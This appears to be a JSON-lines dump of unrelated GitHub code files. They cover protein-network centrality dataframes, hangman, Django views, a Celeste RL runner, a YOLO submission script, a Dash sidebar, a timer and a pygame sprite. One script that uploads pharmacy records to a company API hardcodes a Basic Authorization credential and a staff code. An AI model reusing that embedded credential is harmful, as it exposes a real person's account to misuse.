'cluster_id': [],\n 'cluster_size': [],\n 'cluster_degree': [],\n 'cluster_eigenvector': [],\n 'cluster_closeness': [],\n 'cluster_betweenness': [],\n 'cluster_shapely_betweenness': []\n }\n\n # Prepare data for algorithms.\n print(\"Preparing data\")\n inviable_proteins = lib.graph.read_inviable_proteins()\n if _icp55_shell or _pim1_shell:\n shortest_path_lengths = dict(nx.shortest_path_length(network))\n if _icp55_shell:\n icp55_shell = shortest_path_lengths[lib.constants.ICP55]\n if _pim1_shell:\n pim1_shell = shortest_path_lengths[lib.constants.PIM1]\n\n # Run flagged algorithms.\n if _degree:\n degree = network.degree()\n if _inviable:\n inviable = {node: 1 if node in inviable_proteins else 0 for node in network}\n if _betweenness:\n print(\"Computing betweenness\")\n betweenness = nx.betweenness_centrality(network)\n if _closeness:\n print(\"Computing closeness\")\n closeness = nx.closeness_centrality(network)\n if _bridging:\n print(\"Computing bridging\")\n if _betweenness:\n bridging = lib.centrality.bridging_centrality(network,\n betweeness=betweenness) # Pass betweeness to avoid recalc.\n else:\n bridging = lib.centrality.bridging_centrality(network) # We haven't computed betweenness.\n if _eigenvector:\n print(\"Computing eigenvector\")\n eigenvector = nx.eigenvector_centrality(network)\n if _shapeley_betweenness:\n print(\"Computing shapely betweenness\")\n shapely = lib.shapely_betweenness.ShapelyBetweeness(network)\n\n # Run flagged algorithms in clusters.\n if _cluster_closeness:\n print(\"Computing closeness in cluster\")\n cluster_closeness = [nx.closeness_centrality(cluster) for cluster in clusters]\n if _cluster_eigenvector:\n print(\"Computing eigenvector in cluster\")\n cluster_eigenvector = [nx.eigenvector_centrality(cluster) for cluster in clusters]\n if _cluster_betweenness:\n print(\"Computing betweenness in cluster\")\n cluster_betweenness = [nx.betweenness_centrality(cluster) for cluster in clusters]\n if _cluster_shapely_betweenness:\n print(\"Computing shapely betweenness in cluster\")\n cluster_shapely_betweenness = [lib.shapely_betweenness.ShapelyBetweeness(cluster) for cluster in clusters]\n\n # Iterate over cluster_ids (it's index) and clusters\n # Since clusters form a partition of the network we therefore iterate over every node exactly once.\n print(\"Arranging columns\")\n for cluster_id, cluster in enumerate(clusters):\n for node in cluster:\n columns['protein'].append(node)\n if _degree:\n columns['degree'].append(degree[node])\n if _inviable:\n columns['inviable'].append(inviable[node])\n if _icp55_shell:\n columns['icp55_shell'].append(icp55_shell[node])\n if _pim1_shell:\n columns['pim1_shell'].append(pim1_shell[node])\n if _betweenness:\n columns['betweenness'].append(betweenness[node])\n if _closeness:\n columns['closeness'].append(closeness[node])\n if _bridging:\n columns['bridging'].append(bridging[node])\n if _eigenvector:\n columns['eigenvector'].append(eigenvector[node])\n if _shapeley_betweenness:\n columns['shapely'].append(shapely[node])\n if _cluster_id:\n columns['cluster_id'].append(cluster_id)\n if _cluster_size:\n columns['cluster_size'].append(len(cluster))\n if _cluster_degree:\n columns['cluster_degree'].append(cluster.degree()[node])\n if _cluster_closeness:\n columns['cluster_closeness'].append(cluster_closeness[cluster_id][node])\n if _cluster_eigenvector:\n columns['cluster_eigenvector'].append(cluster_eigenvector[cluster_id][node])\n if _cluster_betweenness:\n columns['cluster_betweenness'].append(cluster_betweenness[cluster_id][node])\n if _cluster_shapely_betweenness:\n columns['cluster_shapely_betweenness'].append(cluster_shapely_betweenness[cluster_id][node])\n\n # Remove empty columns\n columns = {k: v for (k, v) in columns.items() if v != []}\n\n # Write the dataframe to a file\n print(\"Adding dataframe to file\")\n filename = f\"{network_name}.{clusters_name}.nodes.dataframe.csv\"\n filepath = lib.files.make_path_to_dataframes(filename)\n add_dataframe_columns(filepath, columns, on=['protein'])\n\n\ndef cluster_dataframe(network_name, clusters_name, filepath=None):\n # These are all the columns\n columns = {\n 'name': [],\n 'num_clusters': [],\n 'percent_connected': [],\n # 'modularity': [],\n 'sensitivity': [],\n 'positive predicted value': [],\n 'accuracy': [],\n 'fraction_matched': [],\n 'separation': [],\n 'precision': [],\n 'recall': [],\n 'f-measure': [],\n 'mmr': [],\n 'sensitivity_sgd': [],\n 'positive_predicted_value_sgd': [],\n 'accuracy_sgd': [],\n 'fraction_matched_sgd': [],\n 'separation_sgd': [],\n 'precision_sgd': [],\n 'recall_sgd': [],\n 'f-measure_sgd': []\n }\n\n network = lib.graph.read_network(network_name)\n\n clusters = lib.cluster.read_clusters(network_name, clusters_name)\n clusters = list(map(set, clusters)) # Convert to sets for PC2P analysis\n clusters = list(filter(lambda x: len(x) >= 3, clusters))\n\n # Validated complexes\n yhtp2008 = lib.cluster.read_yhtp2008()\n yhtp2008 = list(map(set, yhtp2008)) # Convert to sets for PC2P analysis\n yhtp2008 = list(filter(lambda x: len(x) >= 3, yhtp2008))\n sgd = lib.cluster.read_sgd()\n sgd = list(map(set, sgd)) # Convert to sets for PC2P analysis\n sgd = list(filter(lambda x: len(x) >= 3, sgd))\n\n columns['name'].append(clusters_name)\n columns['num_clusters'].append(len(clusters))\n columns['percent_connected'].append(len(\n [cluster for cluster in clusters if nx.is_connected(network.subgraph(cluster))]\n ) / len(clusters))\n # columns['modularity'].append(nx.algorithms.community.modularity(network, clusters, weight=None))\n\n columns['sensitivity'].append(pc2p_analysis.clusteringwise_sensitivity(yhtp2008, clusters))\n columns['positive predicted value'].append(pc2p_analysis.positive_predictive_value(yhtp2008, clusters))\n columns['accuracy'].append(pc2p_analysis.accuracy(yhtp2008, clusters))\n columns['fraction_matched'].append(pc2p_analysis.fraction_matched(yhtp2008, clusters))\n columns['separation'].append(pc2p_analysis.clusteringwise_separation(yhtp2008, clusters))\n columns['precision'].append(pc2p_analysis.precision_Jaccard(yhtp2008, clusters))\n columns['recall'].append(pc2p_analysis.recall_Jaccard(yhtp2008, clusters))\n columns['f-measure'].append(pc2p_analysis.F_measure_Jaccard(yhtp2008, clusters))\n columns['mmr'].append(pc2p_analysis.maximum_matching_ratio(yhtp2008, clusters))\n\n columns['sensitivity_sgd'].append(pc2p_analysis.clusteringwise_sensitivity(sgd, clusters))\n columns['positive_predicted_value_sgd'].append(pc2p_analysis.positive_predictive_value(sgd, clusters))\n columns['accuracy_sgd'].append(pc2p_analysis.accuracy(sgd, clusters))\n columns['fraction_matched_sgd'].append(pc2p_analysis.fraction_matched(sgd, clusters))\n columns['separation_sgd'].append(pc2p_analysis.clusteringwise_separation(sgd, clusters))\n columns['precision_sgd'].append(pc2p_analysis.precision_Jaccard(sgd, clusters))\n columns['recall_sgd'].append(pc2p_analysis.recall_Jaccard(sgd, clusters))\n columns['f-measure_sgd'].append(pc2p_analysis.F_measure_Jaccard(sgd, clusters))\n\n columns = {k:v for (k,v) in columns.items() if v != []}\n if filepath is None:\n filename = lib.files.make_clusters_dataframe_filename(network_name)\n filepath = lib.files.make_path_to_dataframes(filename)\n add_dataframe_rows(filepath, columns)\n\n\ndef add_dataframe_columns(filepath, columns, on=None):\n \"\"\"\n This function appends columns to an existing dataframe file or creates a brand new file is none exists.\n :param filepath:\n :param columns: A dict of {col_name: rows}\n :param on: The columns to merge old and new data on (same as df.merge)\n :return:\n \"\"\"\n # Create the dataframe.\n df = pd.DataFrame.from_dict(columns)\n\n # If no file exists, write to the filepath.\n if not exists(filepath):\n df.to_csv(filepath)\n return\n\n # If a file exists, we need to know what columns to merge the new data on.\n assert on is not None\n\n # Then read the existing file.\n df2 = pd.read_csv(filepath, index_col=0, header=0)\n df2 = df2.astype({'protein': str}) # Networks such as karate-club and gnp-100-0.5 use integer node names.\n\n # Assert the same number of rows exist (i.e. all proteins accounted for)\n assert len(df) == len(df2)\n\n # Remove overlapping columns from the old dataframe.\n overlap = [col for col in df.columns if col in df2.columns and col not in on]\n df2 = df2.drop(columns=overlap)\n\n # Merge the dataframes on the index\n df3 = df2.merge(df, on=on)\n\n # Write to the filepath\n df3.to_csv(filepath)\n\n\ndef add_dataframe_rows(filepath, columns):\n # Create the dataframe.\n df = pd.DataFrame.from_dict(columns)\n\n # If no file exists, write to the filepath.\n if not exists(filepath):\n df.to_csv(filepath)\n return\n\n # Then read the existing file.\n df2 = pd.read_csv(filepath, index_col=0, header=0)\n # df2 = df2.astype({'protein': str}) # Networks such as karate-club and gnp-100-0.5 use integer node names.\n\n # Assert we have the same columns\n all(df.columns == df2.columns)\n\n # Concatenate the new rows to the old rows\n df3 = pd.concat([df2, df], ignore_index=True)\n\n df3.to_csv(filepath)\n\n\ndef add_min_shell(filepath):\n \"\"\"df must have icp55_shell and pim1_shell\"\"\"\n df = pd.read_csv(filepath, header=0, index_col=0)\n assert \"icp55_shell\" in df.columns and \"pim1_shell\" in df.columns\n df['min-shell'] = df['icp55_shell'].combine(df['pim1_shell'], min, 0)\n df.to_csv(filepath)\n\n\ndef add_min_shell_weighted_centralities(filepath):\n df = pd.read_csv(filepath, header=0, index_col=0)\n df['betweenness/min-shell'] = df['betweenness'] / df['min-shell']\n df['closeness/min-shell'] = df['closeness'] / df['min-shell']\n df['eigenvector/min-shell'] = df['eigenvector'] / df['min-shell']\n df['bridging/min-shell'] = df['bridging'] / df['min-shell']\n df.to_csv(filepath)\n","repo_name":"jkasimotto/PPI-Network-Analysis","sub_path":"lib/dataframes.py","file_name":"dataframes.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19199544599","text":"import requests\nimport json\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom openpyxl import load_workbook\nimport get_teritory\nimport get_city\nimport get_party_type\nimport get_potential\nimport get_products\nimport get_category\n\nurl = \"https://sfa3.mankindpharma.in/wsfaapi/api/newparty/saveChemist\"\n\nroot = tk.Tk()\nroot.withdraw()\nfile_path = filedialog.askopenfilename()\n\n\nwb = load_workbook(file_path)\nws = wb[\"Sheet1\"]\n\nteritories = get_teritory.run()\ncities = get_city.run()\nparty_types = get_party_type.run()\npotentials = get_potential.run()\nproducts = get_products.run()\ncategories = get_category.run()\n\ndef get_teritory_code(teritory_name):\n try:\n terotory_code = teritories[teritory_name]\n return terotory_code\n except:\n raise Exception(f\"Code not found for a Teritory named {teritory_name}\")\n\ndef get_city_code(city_name):\n try:\n citie_code = cities[city_name]\n return citie_code\n except:\n raise Exception(f\"Code not found for a City named {city_name}\")\n\ndef get_party_type_code(patry_type_name):\n try:\n patry_type_code = party_types[patry_type_name]\n return patry_type_code\n except:\n raise Exception(f\"Code not found for a Party type named {patry_type_name}\")\n\ndef get_potential_code(potential_name):\n try:\n potential_code = potentials[potential_name]\n return potential_code\n except:\n raise Exception(f\"Code not found for a Potential named {potential_name}\")\n\ndef get_product_code(product_name):\n try:\n product_code = products[product_name]\n return product_code\n except:\n raise Exception(f\"'Code not found for a Product named {product_name}'\")\n\n\ndef get_categegory_code(category_name):\n category_codes = {'0-5000' : 'D', '5001-20000' : 'C','20001-50000' : 'B','50001-100000':'A','100001-ABOVE':'A+'}\n try:\n category_code = categories[category_codes[category_name]]\n return category_code\n except:\n raise Exception(f\"Code not found for a Category named {category_name}\")\n\n\nif __name__ == '__main__':\n n = 2\n while n < 40:\n if ws.cell(row=n, column=1).value == '' or ws.cell(row=n, column=1).value == None:\n break\n payload = json.dumps([\n {\n \"PARTYCODE\": None,\n \"PARTYNAME\": ws.cell(row=n, column=1).value,\n \"TYPECODE\": get_party_type_code(ws.cell(row=n, column=10).value),\n \"CATGCODE\": get_categegory_code(ws.cell(row=n, column=11).value),\n \"AREACODE\": get_teritory_code(ws.cell(row=n, column=9).value),\n \"CITYCODE\": get_city_code(ws.cell(row=n, column=8).value),\n \"ADDRESS\": ws.cell(row=n, column=2).value,\n \"PINCODE\": ws.cell(row=n, column=4).value,\n \"LANDMARK\": ws.cell(row=n, column=3).value,\n \"MOBILE\": ws.cell(row=n, column=5).value,\n \"EMAIL\": \"\",\n \"POTCODE\": get_potential_code(ws.cell(row=n, column=11).value),\n \"SUPPORT\": ws.cell(row=n, column=7).value,\n \"FREQUENCY\": \"2\",\n \"STAFFCODE\": \"109320\",\n \"STATUS\": \"1\",\n \"DIVCODE\": \"96\",\n \"CONTACT\": ws.cell(row=n, column=6).value,\n \"RXCODE1\": get_product_code(ws.cell(row=n, column=12).value),\n \"RXSUPORT1\": ws.cell(row=n, column=13).value,\n \"RXCODE2\": \"\",\n \"RXSUPORT2\": \"\",\n \"RXCODE3\": \"\",\n \"RXSUPORT3\": \"\",\n \"RXCODE4\": \"\",\n \"RXSUPORT4\": \"\",\n \"REMARKS\": \"\"\n }\n ])\n print(payload)\n n += 1\n headers = {\n 'Authorization': 'Basic MTAwMzkwNTE6MTA5MzIw',\n 'Content-Type': 'application/json'\n }\n #response = requests.request(\"POST\", url, headers=headers, data=payload)\n #print(response.text)\n\n\n","repo_name":"tamilmani-murugan/mankind","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23777698634","text":"# Problem Set 2\n# Name: Deniz Sert\n# Collaborators: Frank Gonzalez\n# Time spent: 5 hr\n# Late Days used: 1\n\nimport random\nimport string\n\n# -----------------------------------\n# HELPER CODE\n# -----------------------------------\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n '''\n returns: list, a list of valid words. Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n '''\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\n\ndef choose_word(wordlist):\n '''\n wordlist (list): list of words (strings)\n\n returns: a word from wordlist at random\n '''\n return random.choice(wordlist)\n\n# -----------------------------------\n# END OF HELPER CODE\n# -----------------------------------\n\n\n# Load the list of words to be accessed from anywhere in the program\nwordlist = load_words()\n\ndef check_victory(secret_word, letters_guessed):\n '''\n secret_word: string, the lowercase word the user is guessing\n letters_guessed: list (of lowercase letters), the letters that have been\n guessed so far\n\n returns: boolean, True if all the letters of secret_word are in letters_guessed,\n False otherwise\n '''\n\n \n #checks to see if there are no guesses\n if len(letters_guessed) == 0:\n return False\n if len(secret_word)== 0:\n return True\n #checks to see if there are any letters in the Secret Words not within\n #the list of guessed letters\n for x in secret_word:\n if x not in letters_guessed:\n return False\n return True\n\n\n\n# Other tries\n# if secret_word==0:\n# return True\n# else:\n# if letters_guessed[0]==secret_word[0]:\n# secret_word\n#\n#\n\n# counter = 0\n# for x in range [0:letters_guessed]:\n# for y in range [0:letters_guessed]:\n# if letters_guessed[x]==secret_word[y]:\n# counter+=1\n# if counter==len(secret_word):\n# return True\n# return False\n# counter = 0\n# while (counter0):\n #informs player on number of guesses left\n print(\"You have\", num_guesses, \"guesses left.\")\n print(\"Available letters:\", get_remaining_letters(letters_guessed))\n \n #user enters guess\n guess = input(\"Please guess a letter: \")\n guess = str.lower(guess)\n\n #game handles it if a special character was inputted\n if str.isalpha(guess) is False:\n print(\"That is not a valid letter. Please enter an input from the alphabet:\")\n elif (guess in letters_guessed):\n print(\"Oops! You've already guessed that letter:\", get_word_progress(secret_word_, letters_guessed))\n \n # incorrect guess\n elif (guess not in secret_word_):\n letters_guessed.append(guess)\n print(\"Oops! That letter is not in my word:\", get_word_progress(secret_word_, letters_guessed))\n num_guesses-=1\n # correct guess\n else:\n letters_guessed.append(guess)\n print(\"Good guess:\", get_word_progress(secret_word_, letters_guessed))\n\n #ran out of guesses\n \n print(\"--------------\")\n if num_guesses<=0:\n print(\"Sorry, you ran out of guesses. The word was \" + secret_word_)\n break\n elif check_victory(secret_word_, letters_guessed):\n print(\"Congratulations, you won!\")\n\n\n\n # finds num of unique characters in the Secret Word\n unique = []\n\n for x in secret_word_:\n if x in unique:\n pass\n else:\n unique.append(x)\n\n #computes score\n print(\"Your total score for this game was\", (2 * (num_guesses) + 3 * (len(secret_word_) + len(unique))))\n break\n\n \n\n\n# When you've completed your hangman function, scroll down to the bottom\n# of the file and uncomment the lines to test\n\n# -----------------------------------\n\ndef choose_letter(secret_word, letters_guessed):\n '''\n * Chooses a random letter to help the player\n \n \n '''\n l = []\n for x in secret_word:\n if x in letters_guessed:\n pass\n else:\n l.append(x)\n new = random.randint(0, len(l)-1)\n revealed_letter = l[new]\n \n return revealed_letter\n \ndef hangman_with_help(secret_word_):\n '''\n secret_word: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, let the user know how many\n letters the secret_word contains and how many guesses they start with.\n\n * The user should start with 10 guesses.\n\n * Before each round, you should display to the user how many guesses\n they have left and the letters that the user has not yet guessed.\n\n * Ask the user to supply one guess per round. Remember to make sure that\n the user puts in a letter.\n\n * The user should receive feedback immediately after each guess\n about whether their guess appears in the computer's word.\n\n * After each guess, you should display to the user the\n partially guessed word so far.\n\n * If the guess is the symbol !, you should reveal to the user one of the\n letters missing from the word at the cost of 2 guesses. If the user does\n not have 2 guesses remaining, print a warning message. Otherwise, add\n this letter to their guessed word and continue playing normally.\n\n Follows the other limitations detailed in the problem write-up.\n '''\n # FILL IN YOUR CODE HERE AND DELETE \"pass\"\n num_guesses = 10\n\n #initialize game\n print(\"Welcome to Hangman!\")\n print(\"I am thinking of a word that is\", len(secret_word_), \"letters long.\")\n print(\"--------------\")\n \n\n\n letters_guessed = []\n hint = \"\"\n called_out = False\n\n while(num_guesses>0):\n #inform player on number of guesses\n print(\"You have\", num_guesses, \"guesses left.\")\n print(\"Available letters:\", get_remaining_letters(letters_guessed))\n \n #user guesses\n guess = input(\"Please guess a letter: \")\n guess = str.lower(guess)\n if str.isalpha(guess) is False:\n #hint\n if guess == \"!\":\n if num_guesses<=2:\n print(\"Oops! Not enough guesses left!\", get_word_progress(secret_word_, letters_guessed))\n else:\n hint = choose_letter(secret_word_, letters_guessed)\n print(\"Letter revealed: \", hint)\n letters_guessed+=hint\n num_guesses-=2\n print(get_word_progress(secret_word_, letters_guessed))\n #yeet\n #special character (not hint)\n else:\n print(\"Oops! That is not a valid letter. Please input a letter from the alphabet\", get_word_progress(secret_word_, letters_guessed))\n called_out = True\n\n #already guessed letter\n if (guess in letters_guessed):\n if (hint in letters_guessed):\n pass\n else:\n print(\"Oops! You've already guessed that letter:\", get_word_progress(secret_word_, letters_guessed))\n\n #handles if hint was given and incorrect guess\n elif (guess not in secret_word_):\n if (hint in letters_guessed):\n pass\n else:\n if called_out is True:\n pass\n else:\n letters_guessed.append(guess)\n print(\"Oops! That letter is not in my word:\", get_word_progress(secret_word_, letters_guessed))\n num_guesses -= 1\n #correct guess\n else:\n letters_guessed.append(guess)\n print(\"Good guess:\", get_word_progress(secret_word_, letters_guessed))\n\n print(\"--------------\")\n #ran out of guesses\n if num_guesses <= 0:\n print(\"Sorry, you ran out of guesses. The word was \" + secret_word_)\n break\n #win\n elif check_victory(secret_word_, letters_guessed):\n print(\"Congratulations, you won!\")\n\n # finds num of unique characters in the Secret Word\n unique = []\n\n for x in secret_word_:\n if x in unique:\n pass\n else:\n unique.append(x)\n\n #prints score\n print(\"Your total score for this game was\", (2 * (num_guesses) + 3 * (len(secret_word_) + len(unique))))\n break\n\n\n# When you've completed your hangman_with_help function, comment the two similar\n# lines below that were used to run the hangman function, and then uncomment\n# those two lines and run this file to test!\n\n# Hint: You might want to pick your own secret_word while you're testing.\n\n\nif __name__ == \"__main__\":\n # To test part 2, uncomment the following two lines.\n\n #secret_word = choose_word(wordlist)\n #hangman(\"ab\")\n\n###############\n\n # To test part 3, comment out the above lines and\n # uncomment the following two lines.\n\n secret_word = choose_word(wordlist)\n hangman_with_help(secret_word)\n\n # SUBMISSION INSTRUCTIONS\n # -----------------------\n # It doesn't matter if the lines above are commented in or not\n # when you submit your pset. However, please run ps2_student_tester.py\n # one more time before submitting to make sure all the tests pass.\n\n","repo_name":"dsert1/Hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":13027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5462139529","text":"from rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom ..models import Lead\nfrom ..serializers import BasicLeadSerializer, LeadSerializer\n\n\nclass ListLeadAPIView(APIView):\n def get(self, request):\n leads = Lead.objects.all()\n\n lead_list = []\n for lead in leads:\n data = {\n 'id': lead.id,\n 'first_name': lead.first_name,\n 'last_name': lead.last_name,\n 'email': lead.email,\n 'phone': lead.phone,\n 'message': lead.message\n }\n lead_list.append(data)\n\n return Response(lead_list)\n\n\nclass ListLeadWithSerializerAPIView(APIView):\n def get(self, request):\n leads = Lead.objects.all()\n\n # Method 1:\n lead_list = []\n for lead in leads:\n serializer = BasicLeadSerializer(lead)\n lead_list.append(serializer.data)\n\n # Method 2:\n serializer = BasicLeadSerializer(leads, many=True)\n lead_list = serializer.data\n\n return Response(lead_list)\n\n\nclass ListLeadGenericAPIView(ListAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer\n","repo_name":"yothinix/pysomtum-generic-demo","sub_path":"pysomtum/leads/views/list_api_views.py","file_name":"list_api_views.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"31027829674","text":"import gymnasium as gym\nfrom stable_baselines3 import PPO\nfrom pico8gym.envs import CelesteEnv, PicoVecEnv, SB3VecEnvWrapper\nfrom stable_baselines3.common.callbacks import CheckpointCallback, EvalCallback, CallbackList\nfrom stable_baselines3.common.vec_env import VecFrameStack\n\ndef makeEnv():\n return gym.make('pico8gym/celeste-v0')\nenv = SB3VecEnvWrapper(PicoVecEnv([makeEnv] * 1))\nenv = VecFrameStack(env, n_stack=4)\n\n# model = PPO.load(\"logs/best_model\", env=env)\n# model = PPO.load(\"models/best_celeste_t3\", env=env)\nmodel = PPO.load(\"logs/celeste_t5_399960_steps\", env=env)\nvec_env = model.get_env()\nobs = vec_env.reset()\nfor i in range(10000):\n action, _state = model.predict(obs, deterministic=True)\n obs, reward, done, info = vec_env.step(action)\n vec_env.render()\n\nenv.close()","repo_name":"Jeffjewett27/PICO-Gym","sub_path":"agents/celeste_run.py","file_name":"celeste_run.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"19662923903","text":"from django.db import models\n\n\n# Create your models here.\nclass BotUser(models.Model):\n tg_id = models.CharField(max_length=256)\n # is_open_for_requests = models.BooleanField(default=False)\n open_for_requests_until = models.DateTimeField(null=True, blank=True)\n\n first_name = models.CharField(max_length=256, blank=True, null=True)\n last_name = models.CharField(max_length=256, blank=True, null=True)\n username = models.CharField(max_length=256, blank=True, null=True)\n\n def get_username(self):\n return self.username if self.username else f'{self.first_name} {self.last_name}'\n\n\nclass Match(models.Model):\n requester_tg_id = models.PositiveIntegerField()\n responder_tg_id = models.PositiveIntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Log(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n data = models.JSONField()\n","repo_name":"alifanov/drinker_bot","sub_path":"bot/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"71010047407","text":"import json\nimport zipfile\nimport os\n\n\"\"\" KJØR FRA TDT4265_project \"\"\"\n\npath_to_zip_file = 'send_to_your_computer.zip'\n\npath_to = 'submissions/predictions'\n\nfolders = os.listdir(path_to)\nfolders = [folder for folder in folders if folder.startswith('pred') and len(folder) == 6]\nidentifier = str(int(folders[-1][-2:]) + 1)\n\nfoldername = 'pred' + identifier\n\nsavefolder = path_to + '/' + foldername\n\nwith zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:\n zip_ref.extractall(savefolder)\n\nos.remove(path_to_zip_file)\n\nlabels_path = savefolder \nimage_folder_path = 'RDD2022/Norway/test/images'\n\nsubmission_json_path = f'{path_to}/submission{identifier}.json'\noutput_json_path = f'{path_to}/output{identifier}.json'\nprint(labels_path)\nprint(submission_json_path)\nprint(image_folder_path)\n\nos.system(f'globox convert {labels_path} {submission_json_path} --format yolov5 --save_fmt coco --img_folder {image_folder_path} --coco_auto_ids')\n\nwith open(submission_json_path, 'r') as f:\n data = json.load(f)\n anns = data['annotations']\nwith open(output_json_path,'w') as f:\n json.dump(anns,f)","repo_name":"TinusAlsos/TDT4265_project","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23350346407","text":"\"\"\"\n{\n \"title\": \"Sidebar Layout\",\n \"owner\": (\"Wafa'a Aburub\", \"wafaa.github@gmail.com\"),\n \"description\": \"Collection of dash components; create the dashboard sidebar.\"\n}\n\"\"\"\n\n\nfrom dash import html\nfrom datetime import date\nfrom components.styles import sidebar_style, linkedin_logo_style, text_style, job_title_img_style, \\\n profile_headline_style, signup_img_style, registration_date_style\n\n\ndef render(owner_name: str, profile_link: str, geo_loc: str, profile_headline: str, registration_date: date) -> html.Div:\n \"\"\"\n Adds a layout to the dashboard interface sidebar.\n \"\"\"\n\n sidebar = html.Div(\n [\n html.Img(src=\"../assets/linkedin_logo.png\", width=\"200\", height=\"50\", style=linkedin_logo_style),\n html.Hr(),\n\n html.A(children=owner_name, href=profile_link, target=\"_blank\", className=\"lead\", style=text_style),\n html.P(geo_loc, style=text_style),\n\n html.Div([html.Img(src=\"../assets/job_title_img.png\", width=\"32\", height=\"32\", style=job_title_img_style),\n html.P(profile_headline, style=profile_headline_style)]),\n\n html.Div([html.Img(src=\"../assets/signup_img.png\", width=\"40\", height=\"40\", style=signup_img_style),\n html.P(\"Registration Date\\n {}\".format(registration_date, profile_link), style=registration_date_style)])],\n\n style=sidebar_style)\n\n return sidebar\n\n\n","repo_name":"Wafaa-AbuRub/LinkedIn-Profile-Analysis-Dashboard","sub_path":"components/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12043447800","text":"# Imports\nfrom datetime import datetime, time\nfrom time import sleep\nimport os # Needed for clearing screen each second\nimport sys # For exiting program (cleanly)\n\ndef dateDiffInSeconds(date1, date2):\n # [(Target date&time) - (Current date&time)]\n timedelta = date2 - date1\n return timedelta.days * 24 * 3600 + timedelta.seconds\n\ndef daysHoursMinutesSecondsFromSeconds(seconds):\n\tminutes, seconds = divmod(seconds, 60)\n\thours, minutes = divmod(minutes, 60)\n\tdays, hours = divmod(hours, 24)\n\treturn (days, hours, minutes, seconds)\n\n# Ask user for the target date & time, to count down to\nprint(\"\\nThe clock will be displayed in the following format: \")\nprint(\"YYYY-MM-DD %H:%M:%S\\n\")\nprint(\"Please enter a target date and time for the countdown.\")\n\nyear = int(input(\"\\nEnter the year (YYYY): \"))\nmonth = int(input(\"\\nEnter the month (MM): \"))\nday = int(input(\"\\nEnter the day (DD): \"))\nhour = int(input(\"\\nEnter the hour (24-hr format)(hh): \"))\nminute = int(input(\"\\nEnter the minute (mm): \"))\nsecond = int(input(\"\\nEnter the second (ss): \"))\n\nreq = datetime(year, month, day, hour, minute, second)\nnow = datetime.now()\n\nwhile req>now:\n # Clear terminal screen upon launching applet\n os.system('cls||clear')\n print(\"%dd %dh %dm %ds\" % daysHoursMinutesSecondsFromSeconds(dateDiffInSeconds(now, req)))\n sleep(1)\n\n now = datetime.now()\n\n# Let the user know that the countdown has finished\nprint(\"Done\")\n# Exit program cleanly\nsys.exit()\n","repo_name":"TimelessFez/Py-Minus","sub_path":"pyminus.py","file_name":"pyminus.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11460067407","text":"#!/usr/bin/env python3\nimport pygame as pg\nfrom settings import *\nfrom UltraColor import *\nimport pytmx\nvec = pg.math.Vector2\n\n\nclass Spritesheet:\n # utility class for loading and parsing spritesheets\n def __init__(self, filename):\n self.spritesheet = pg.image.load(filename).convert()\n\n def get_image(self, x, y, width, height):\n # grab an image out of a larger spritesheet\n image = pg.Surface((width, height))\n image.blit(self.spritesheet, (0, 0), (x, y, width, height))\n return image\n\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.get_faces()\n self.image = self.south\n self.image.set_colorkey(Color.Black)\n self.rect = self.image.get_rect()\n self.rect.center = (x, y)\n self.x = x\n self.y = y\n self.pos = x, y\n\n\n def get_keys(self):\n\n self.vx, self.vy = 0, 0\n keys = pg.key.get_pressed()\n if keys[pg.K_LEFT] or keys[pg.K_a]:\n self.vx = -PLAYER_SPEED\n if keys[pg.K_RIGHT] or keys[pg.K_d]:\n self.vx = PLAYER_SPEED\n if keys[pg.K_UP] or keys[pg.K_w]:\n self.vy = -PLAYER_SPEED\n if keys[pg.K_DOWN] or keys[pg.K_s]:\n self.vy = PLAYER_SPEED\n if self.vx != 0 and self.vy != 0:\n self.vx *= 0.7071\n self.vy *= 0.7071\n\n\n def get_faces(self):\n self.south = self.game.spritesheet.get_image(0, 0, 32, 32)\n self.south.set_colorkey(Color.Black)\n self.north = self.game.spritesheet.get_image(32, 32, 32, 32)\n self.north.set_colorkey(Color.Black)\n self.east = self.game.spritesheet.get_image(0, 32, 32, 32)\n self.east.set_colorkey(Color.Black)\n self.west = self.game.spritesheet.get_image(32, 0, 32, 32)\n self.west.set_colorkey(Color.Black)\n\n\n\n def collide_with_walls(self, 